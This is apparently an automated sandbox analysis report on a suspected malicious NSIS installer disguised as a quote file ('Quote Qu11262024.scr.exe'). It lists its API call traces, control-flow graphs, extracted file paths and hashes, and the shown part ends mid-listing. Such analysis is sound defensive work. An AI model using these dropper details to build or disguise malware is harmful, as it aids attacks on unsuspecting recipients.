                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                    • String ID: Softwoods Setup: Installing
                                                                                                    • API String ID: 3282139019-738886619
                                                                                                    • Opcode ID: dc8d55e0a2f6036b41479d996bf1f3e924c742b7dcbb539478d9977daf0f97ff
                                                                                                    • Instruction ID: 30db9fb023d46c2b45d50756591254b9d2d19bbbd826df3873c5888a3d469ee7
                                                                                                    • Opcode Fuzzy Hash: dc8d55e0a2f6036b41479d996bf1f3e924c742b7dcbb539478d9977daf0f97ff
                                                                                                    • Instruction Fuzzy Hash: FCC12271600204BBDB206F61EE89E2B3ABDFB84306F51053EF651B51F1CB7999829B1D

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 290 403902-40391a call 40646c 293 40391c-40392c call 406032 290->293 294 40392e-40395f call 405fbb 290->294 303 403982-4039ab call 403bc7 call 405b5a 293->303 299 403961-403972 call 405fbb 294->299 300 403977-40397d lstrcatA 294->300 299->300 300->303 308 4039b1-4039b6 303->308 309 403a32-403a3a call 405b5a 303->309 308->309 310 4039b8-4039dc call 405fbb 308->310 315 403a48-403a6d LoadImageA 309->315 316 403a3c-403a43 call 4060f6 309->316 310->309 317 4039de-4039e0 310->317 319 403aee-403af6 call 40140b 315->319 320 403a6f-403a9f RegisterClassA 315->320 316->315 321 4039f1-4039fd lstrlenA 317->321 322 4039e2-4039ef call 405a97 317->322 334 403b00-403b0b call 403bc7 319->334 335 403af8-403afb 319->335 323 403aa5-403ae9 SystemParametersInfoA CreateWindowExA 320->323 324 403bbd 320->324 328 403a25-403a2d call 405a6c call 4060d4 321->328 329 4039ff-403a0d lstrcmpiA 321->329 322->321 323->319 327 403bbf-403bc6 324->327 328->309 329->328 333 403a0f-403a19 GetFileAttributesA 329->333 338 403a1b-403a1d 333->338 339 403a1f-403a20 call 405ab3 333->339 343 403b11-403b2b ShowWindow call 4063fe 334->343 344 403b94-403b95 call 4052cd 334->344 335->327 338->328 338->339 339->328 351 403b37-403b49 GetClassInfoA 343->351 352 403b2d-403b32 call 4063fe 343->352 347 403b9a-403b9c 344->347 349 403bb6-403bb8 call 40140b 347->349 350 403b9e-403ba4 347->350 349->324 350->335 353 403baa-403bb1 call 40140b 350->353 356 403b61-403b84 DialogBoxParamA call 40140b 351->356 357 403b4b-403b5b GetClassInfoA RegisterClassA 351->357 352->351 353->335 361 403b89-403b92 call 403852 356->361 357->356 361->327
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040646C: GetModuleHandleA.KERNEL32(?,?,?,0040339B,0000000A), ref: 0040647E
                                                                                                      • Part of subcall function 0040646C: GetProcAddress.KERNEL32(00000000,?), ref: 00406499
                                                                                                    • lstrcatA.KERNEL32(1033,Softwoods Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Softwoods Setup: Installing,00000000,00000002,76233410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Quote Qu11262024.scr.exe",00000000), ref: 0040397D
                                                                                                    • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pistoled\puddingstone\Flodsengenes,1033,Softwoods Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Softwoods Setup: Installing,00000000,00000002,76233410), ref: 004039F2
                                                                                                    • lstrcmpiA.KERNEL32(?,.exe), ref: 00403A05
                                                                                                    • GetFileAttributesA.KERNEL32(Call), ref: 00403A10
                                                                                                    • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pistoled\puddingstone\Flodsengenes), ref: 00403A59
                                                                                                      • Part of subcall function 00406032: wsprintfA.USER32 ref: 0040603F
                                                                                                    • RegisterClassA.USER32(00423EC0), ref: 00403A96
                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AAE
                                                                                                    • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AE3
                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403B19
                                                                                                    • GetClassInfoA.USER32(00000000,RichEdit20A,00423EC0), ref: 00403B45
                                                                                                    • GetClassInfoA.USER32(00000000,RichEdit,00423EC0), ref: 00403B52
                                                                                                    • RegisterClassA.USER32(00423EC0), ref: 00403B5B
                                                                                                    • DialogBoxParamA.USER32(?,00000000,00403C9F,00000000), ref: 00403B7A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                    • String ID: "C:\Users\user\Desktop\Quote Qu11262024.scr.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pistoled\puddingstone\Flodsengenes$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Softwoods Setup: Installing$_Nb
                                                                                                    • API String ID: 1975747703-2381084976
                                                                                                    • Opcode ID: 911f59c09f5ab7d516001fbeaf9dc91e1bcf998f0a803a192a35f9c5a58ea740
                                                                                                    • Instruction ID: 39a269e0f652501f5ae319d3c1712d535f8ca0f02f8520fc91e595cfb3b0c8d2
                                                                                                    • Opcode Fuzzy Hash: 911f59c09f5ab7d516001fbeaf9dc91e1bcf998f0a803a192a35f9c5a58ea740
                                                                                                    • Instruction Fuzzy Hash: F261D4707406006ED620AF65AD45F2B7A6CEB8574AF40047FF991B22E2DB7D9D028E2D

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 364 402db3-402e01 GetTickCount GetModuleFileNameA call 405c6d 367 402e03-402e08 364->367 368 402e0d-402e3b call 4060d4 call 405ab3 call 4060d4 GetFileSize 364->368 369 403052-403056 367->369 376 402e41-402e58 368->376 377 402f2b-402f39 call 402d14 368->377 378 402e5a 376->378 379 402e5c-402e69 call 4032ca 376->379 384 40300a-40300f 377->384 385 402f3f-402f42 377->385 378->379 386 402fc6-402fce call 402d14 379->386 387 402e6f-402e75 379->387 384->369 388 402f44-402f5c call 4032e0 call 4032ca 385->388 389 402f6e-402fba GlobalAlloc call 406591 call 405c9c CreateFileA 385->389 386->384 391 402ef5-402ef9 387->391 392 402e77-402e8f call 405c28 387->392 388->384 412 402f62-402f68 388->412 415 402fd0-403000 call 4032e0 call 403059 389->415 416 402fbc-402fc1 389->416 396 402f02-402f08 391->396 397 402efb-402f01 call 402d14 391->397 392->396 410 402e91-402e98 392->410 403 402f0a-402f18 call 406523 396->403 404 402f1b-402f25 396->404 397->396 403->404 404->376 404->377 410->396 414 402e9a-402ea1 410->414 412->384 412->389 414->396 417 402ea3-402eaa 414->417 423 403005-403008 415->423 416->369 417->396 420 402eac-402eb3 417->420 420->396 422 402eb5-402ed5 420->422 422->384 424 402edb-402edf 422->424 423->384 425 403011-403022 423->425 426 402ee1-402ee5 424->426 427 402ee7-402eef 424->427 429 403024 425->429 430 40302a-40302f 425->430 426->377 426->427 427->396 428 402ef1-402ef3 427->428 428->396 429->430 431 403030-403036 430->431 431->431 432 403038-403050 call 405c28 431->432 432->369
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00402DC7
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Quote Qu11262024.scr.exe,00000400), ref: 00402DE3
                                                                                                      • Part of subcall function 00405C6D: GetFileAttributesA.KERNELBASE(00000003,00402DF6,C:\Users\user\Desktop\Quote Qu11262024.scr.exe,80000000,00000003), ref: 00405C71
                                                                                                      • Part of subcall function 00405C6D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Quote Qu11262024.scr.exe,C:\Users\user\Desktop\Quote Qu11262024.scr.exe,80000000,00000003), ref: 00402E2C
                                                                                                    • GlobalAlloc.KERNELBASE(00000040,0040A130), ref: 00402F73
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DBD, 00402F8B
                                                                                                    • Error launching installer, xrefs: 00402E03
                                                                                                    • Null, xrefs: 00402EAC
                                                                                                    • soft, xrefs: 00402EA3
                                                                                                    • Inst, xrefs: 00402E9A
                                                                                                    • "C:\Users\user\Desktop\Quote Qu11262024.scr.exe", xrefs: 00402DB3
                                                                                                    • C:\Users\user\Desktop, xrefs: 00402E0E, 00402E13, 00402E19
                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 0040300A
                                                                                                    • C:\Users\user\Desktop\Quote Qu11262024.scr.exe, xrefs: 00402DCD, 00402DDC, 00402DF0, 00402E0D
                                                                                                    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FBC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                    • String ID: "C:\Users\user\Desktop\Quote Qu11262024.scr.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Quote Qu11262024.scr.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                    • API String ID: 2803837635-3481777611
                                                                                                    • Opcode ID: 3b7fdf3be9818111248ef6fadbd0ad96985f208c194466f0e59558712b11e71f
                                                                                                    • Instruction ID: ecc3110ea449af434fd8a6ba074f2aeffe997969258775221aae52b6e548866b
                                                                                                    • Opcode Fuzzy Hash: 3b7fdf3be9818111248ef6fadbd0ad96985f208c194466f0e59558712b11e71f
                                                                                                    • Instruction Fuzzy Hash: 8161D431A40215ABDB20EF64DD89B9E7BB8EB44359F20403BF611B72D1D7789E418B9C

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 435 4060f6-406101 436 406103-406112 435->436 437 406114-40612a 435->437 436->437 438 406130-40613b 437->438 439 40631b-40631f 437->439 438->439 440 406141-406148 438->440 441 406325-40632f 439->441 442 40614d-406157 439->442 440->439 443 406331-406335 call 4060d4 441->443 444 40633a-40633b 441->444 442->441 445 40615d-406164 442->445 443->444 447 40616a-40619e 445->447 448 40630e 445->448 449 4061a4-4061ae 447->449 450 4062bb-4062be 447->450 451 406310-406316 448->451 452 406318-40631a 448->452 453 4061b0-4061b4 449->453 454 4061c8 449->454 455 4062c0-4062c3 450->455 456 4062ee-4062f1 450->456 451->439 452->439 453->454 462 4061b6-4061ba 453->462 459 4061cf-4061d6 454->459 457 4062d3-4062df call 4060d4 455->457 458 4062c5-4062d1 call 406032 455->458 460 4062f3-4062fa call 4060f6 456->460 461 4062ff-40630c lstrlenA 456->461 473 4062e4-4062ea 457->473 458->473 464 4061d8-4061da 459->464 465 4061db-4061dd 459->465 460->461 461->439 462->454 468 4061bc-4061c0 462->468 464->465 471 406216-406219 465->471 472 4061df-4061fa call 405fbb 465->472 468->454 469 4061c2-4061c6 468->469 469->459 476 406229-40622c 471->476 477 40621b-406227 GetSystemDirectoryA 471->477 478 4061ff-406202 472->478 473->461 475 4062ec 473->475 479 4062b3-4062b9 call 40633e 475->479 481 406299-40629b 476->481 482 40622e-40623c GetWindowsDirectoryA 476->482 480 40629d-4062a0 477->480 483 4062a2-4062a6 478->483 484 406208-406211 call 4060f6 478->484 479->461 480->479 480->483 481->480 485 40623e-406248 481->485 482->481 483->479 490 4062a8-4062ae lstrcatA 483->490 484->480 487 406262-406278 SHGetSpecialFolderLocation 485->487 488 40624a-40624d 485->488 493 406296 487->493 494 40627a-406294 SHGetPathFromIDListA CoTaskMemFree 487->494 488->487 492 40624f-406256 488->492 490->479 496 40625e-406260 492->496 493->481 494->480 494->493 496->480 496->487
                                                                                                    APIs
                                                                                                    • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00406221
                                                                                                    • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,00000000,00405233,Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,00000000), ref: 00406234
                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00405233,00000000,?,Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,00000000,00405233,Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,00000000), ref: 00406270
                                                                                                    • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 0040627E
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 0040628A
                                                                                                    • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004062AE
                                                                                                    • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,00000000,00405233,Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,00000000,00000000,00000000,00000000), ref: 00406300
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                    • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                    • API String ID: 717251189-2878509823
                                                                                                    • Opcode ID: 8bce0edba52f21d290bbbf1ebf35138e19c1224ad3dbedd1a6564b9b943cb076
                                                                                                    • Instruction ID: fc6e9f960b511357ceabef78db8b274e3b367e60918ad55153a6f3bd2d562e67
                                                                                                    • Opcode Fuzzy Hash: 8bce0edba52f21d290bbbf1ebf35138e19c1224ad3dbedd1a6564b9b943cb076
                                                                                                    • Instruction Fuzzy Hash: EA61F131A00110AADF20AF24C9847BE3BA4EB96310F52417FE953BA2D1C73C4962DB5E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 566 401759-40177c call 402acb call 405ad9 571 401786-401798 call 4060d4 call 405a6c lstrcatA 566->571 572 40177e-401784 call 4060d4 566->572 577 40179d-4017a3 call 40633e 571->577 572->577 582 4017a8-4017ac 577->582 583 4017ae-4017b8 call 4063d7 582->583 584 4017df-4017e2 582->584 592 4017ca-4017dc 583->592 593 4017ba-4017c8 CompareFileTime 583->593 585 4017e4-4017e5 call 405c48 584->585 586 4017ea-401806 call 405c6d 584->586 585->586 594 401808-40180b 586->594 595 40187e-4018a7 call 4051fb call 403059 586->595 592->584 593->592 596 401860-40186a call 4051fb 594->596 597 40180d-40184f call 4060d4 * 2 call 4060f6 call 4060d4 call 4057f0 594->597 609 4018a9-4018ad 595->609 610 4018af-4018bb SetFileTime 595->610 607 401873-401879 596->607 597->582 630 401855-401856 597->630 612 402960 607->612 609->610 611 4018c1-4018cc CloseHandle 609->611 610->611 614 4018d2-4018d5 611->614 615 402957-40295a 611->615 616 402962-402966 612->616 618 4018d7-4018e8 call 4060f6 lstrcatA 614->618 619 4018ea-4018ed call 4060f6 614->619 615->612 626 4018f2-4022ec call 4057f0 618->626 619->626 626->616 630->607 632 401858-401859 630->632 632->596
                                                                                                    APIs
                                                                                                    • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pistoled\puddingstone\Flodsengenes\Opkaldtes,00000000,00000000,00000031), ref: 00401798
                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pistoled\puddingstone\Flodsengenes\Opkaldtes,00000000,00000000,00000031), ref: 004017C2
                                                                                                      • Part of subcall function 004060D4: lstrcpynA.KERNEL32(?,?,00000400,004033FA,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060E1
                                                                                                      • Part of subcall function 004051FB: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D8B,00000000,?), ref: 00405234
                                                                                                      • Part of subcall function 004051FB: lstrlenA.KERNEL32(00402D8B,Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D8B,00000000), ref: 00405244
                                                                                                      • Part of subcall function 004051FB: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,00402D8B,00402D8B,Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,00000000,00000000,00000000), ref: 00405257
                                                                                                      • Part of subcall function 004051FB: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll), ref: 00405269
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp$C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pistoled\puddingstone\Flodsengenes\Opkaldtes$Call
                                                                                                    • API String ID: 1941528284-3442545834
                                                                                                    • Opcode ID: dd6b90a664e54d8f451ca0865c2ba9ccff7de779d1b105713cd20e380eb9224e
                                                                                                    • Instruction ID: fd1e5837bc3e5b85a3a6a652d6a190d3276035103b1b7c060325475ee2933dee
                                                                                                    • Opcode Fuzzy Hash: dd6b90a664e54d8f451ca0865c2ba9ccff7de779d1b105713cd20e380eb9224e
                                                                                                    • Instruction Fuzzy Hash: 7C41C931900515BACB10BBB5CC45EAF36A8EF01369B61823BF522B11E1CB7C8A519B6D

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 633 4051fb-405210 634 4052c6-4052ca 633->634 635 405216-405228 633->635 636 405233-40523f lstrlenA 635->636 637 40522a-40522e call 4060f6 635->637 639 405241-405251 lstrlenA 636->639 640 40525c-405260 636->640 637->636 639->634 643 405253-405257 lstrcatA 639->643 641 405262-405269 SetWindowTextA 640->641 642 40526f-405273 640->642 641->642 644 405275-4052b7 SendMessageA * 3 642->644 645 4052b9-4052bb 642->645 643->640 644->645 645->634 646 4052bd-4052c0 645->646 646->634
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D8B,00000000,?), ref: 00405234
                                                                                                    • lstrlenA.KERNEL32(00402D8B,Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D8B,00000000), ref: 00405244
                                                                                                    • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,00402D8B,00402D8B,Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,00000000,00000000,00000000), ref: 00405257
                                                                                                    • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll), ref: 00405269
                                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
                                                                                                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
                                                                                                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                    • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll
                                                                                                    • API String ID: 2531174081-1724556243
                                                                                                    • Opcode ID: 62b99d559e12ab307ad42b900a1861285d0c5f5ba6af5813358272bab5bc881c
                                                                                                    • Instruction ID: 09b19f042309e47acee5650f88afd0d12d3a1540eb7d8618ae31c51346f6e7a0
                                                                                                    • Opcode Fuzzy Hash: 62b99d559e12ab307ad42b900a1861285d0c5f5ba6af5813358272bab5bc881c
                                                                                                    • Instruction Fuzzy Hash: 6D218C71A00118BBDB119FA9DD8099EBFB9EF08354F04807AF544B6291C7798E418F98

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 647 4056c1-40570c CreateDirectoryA 648 405712-40571f GetLastError 647->648 649 40570e-405710 647->649 650 405739-40573b 648->650 651 405721-405735 SetFileSecurityA 648->651 649->650 651->649 652 405737 GetLastError 651->652 652->650
                                                                                                    APIs
                                                                                                    • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405704
                                                                                                    • GetLastError.KERNEL32 ref: 00405718
                                                                                                    • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040572D
                                                                                                    • GetLastError.KERNEL32 ref: 00405737
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004056E7
                                                                                                    • C:\Users\user\Desktop, xrefs: 004056C1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
